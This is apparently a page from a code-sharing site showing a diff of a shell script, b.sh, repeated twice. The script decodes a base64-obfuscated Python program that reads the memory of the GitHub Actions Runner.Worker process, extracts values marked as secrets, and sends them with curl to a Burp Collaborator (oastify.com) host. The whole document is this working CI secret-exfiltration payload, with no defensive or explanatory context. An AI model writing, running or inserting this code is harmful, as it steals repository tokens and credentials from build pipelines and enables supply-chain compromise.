omarkurt · December 20, 2025 04:12
diff --git a/b.sh b/b.sh
 # Replace with Burp collaborator domain or similar.
 YOUR_EXFIL="bijigit.in9zg9anuvaojfgzqc6htndylprgf63v.oastify.com"

 if [[ "$OSTYPE" == "linux-gnu" ]]; then
  DUMP_SCRIPT="aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCgojIENyZWRpdCB0byBnaXRodWIuY29tL25pa2l0YXN0dXBpbiBmb3IgdGhlIHNjcmlwdC4KCmRlZiBnZXRfcGlkKCk6CiAgICBwaWRzID0gW3BpZCBmb3IgcGlkIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcGlkLmlzZGlnaXQoKV0KCiAgICBmb3IgcGlkIGluIHBpZHM6CiAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGNtZGxpbmVfZjoKICAgICAgICAgICAgaWYgYidSdW5uZXIuV29ya2VyJyBpbiBjbWRsaW5lX2YucmVhZCgpOgogICAgICAgICAgICAgICAgcmV0dXJuIHBpZAoKICAgIHJhaXNlIEV4Y2VwdGlvbignQ2FuIG5vdCBnZXQgcGlkIG9mIFJ1bm5lci5Xb3JrZXInKQoKcGlkID0gZ2V0X3BpZCgpCgptYXBfcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWFwcyIKbWVtX3BhdGggPSBmIi9wcm9jL3twaWR9L21lbSIKCndpdGggb3BlbihtYXBfcGF0aCwgJ3InKSBhcyBtYXBfZiwgb3BlbihtZW1fcGF0aCwgJ3JiJywgMCkgYXMgbWVtX2Y6CiAgICBmb3IgbGluZSBpbiBtYXBfZi5yZWFkbGluZXMoKTogICMgZm9yIGVhY2ggbWFwcGVkIHJlZ2lvbgogICAgICAgIG0gPSByZS5tYXRjaChyJyhbMC05QS1GYS1mXSspLShbMC05QS1GYS1mXSspIChbLXJdKScsIGxpbmUpCiAgICAgICAgaWYgbS5ncm91cCgzKSA9PSAncic6ICAjIHJlYWRhYmxlIHJlZ2lvbgogICAgICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgbWVtX2Yuc2VlayhzdGFydCkgICMgc2VlayB0byByZWdpb24gc3RhcnQKICAgICAgICAKICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgY2h1bmsgPSBtZW1fZi5yZWFkKGVuZCAtIHN0YXJ0KSAgIyByZWFkIHJlZ2lvbiBjb250ZW50cwogICAgICAgICAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoY2h1bmspCiAgICAgICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICAgICAgY29udGludWU="
  echo $DUMP_SCRIPT | base64 -d > /tmp/script.py
  B64_BLOB=`sudo python3 /tmp/script.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0`
  curl -s -d "$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null
 else
  exit 0
 fi
	# Replace with Burp collaborator domain or similar.
	YOUR_EXFIL="bijigit.in9zg9anuvaojfgzqc6htndylprgf63v.oastify.com"

	if [[ "$OSTYPE" == "linux-gnu" ]]; then
	DUMP_SCRIPT="aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCgojIENyZWRpdCB0byBnaXRodWIuY29tL25pa2l0YXN0dXBpbiBmb3IgdGhlIHNjcmlwdC4KCmRlZiBnZXRfcGlkKCk6CiAgICBwaWRzID0gW3BpZCBmb3IgcGlkIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcGlkLmlzZGlnaXQoKV0KCiAgICBmb3IgcGlkIGluIHBpZHM6CiAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGNtZGxpbmVfZjoKICAgICAgICAgICAgaWYgYidSdW5uZXIuV29ya2VyJyBpbiBjbWRsaW5lX2YucmVhZCgpOgogICAgICAgICAgICAgICAgcmV0dXJuIHBpZAoKICAgIHJhaXNlIEV4Y2VwdGlvbignQ2FuIG5vdCBnZXQgcGlkIG9mIFJ1bm5lci5Xb3JrZXInKQoKcGlkID0gZ2V0X3BpZCgpCgptYXBfcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWFwcyIKbWVtX3BhdGggPSBmIi9wcm9jL3twaWR9L21lbSIKCndpdGggb3BlbihtYXBfcGF0aCwgJ3InKSBhcyBtYXBfZiwgb3BlbihtZW1fcGF0aCwgJ3JiJywgMCkgYXMgbWVtX2Y6CiAgICBmb3IgbGluZSBpbiBtYXBfZi5yZWFkbGluZXMoKTogICMgZm9yIGVhY2ggbWFwcGVkIHJlZ2lvbgogICAgICAgIG0gPSByZS5tYXRjaChyJyhbMC05QS1GYS1mXSspLShbMC05QS1GYS1mXSspIChbLXJdKScsIGxpbmUpCiAgICAgICAgaWYgbS5ncm91cCgzKSA9PSAncic6ICAjIHJlYWRhYmxlIHJlZ2lvbgogICAgICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgbWVtX2Yuc2VlayhzdGFydCkgICMgc2VlayB0byByZWdpb24gc3RhcnQKICAgICAgICAKICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgY2h1bmsgPSBtZW1fZi5yZWFkKGVuZCAtIHN0YXJ0KSAgIyByZWFkIHJlZ2lvbiBjb250ZW50cwogICAgICAgICAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoY2h1bmspCiAgICAgICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICAgICAgY29udGludWU="
	echo $DUMP_SCRIPT \| base64 -d > /tmp/script.py
	B64_BLOB=`sudo python3 /tmp/script.py \| tr -d '\0' \| grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' \| sort -u \| base64 -w 0`
	curl -s -d "$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null
	else
	exit 0
	fi
No results found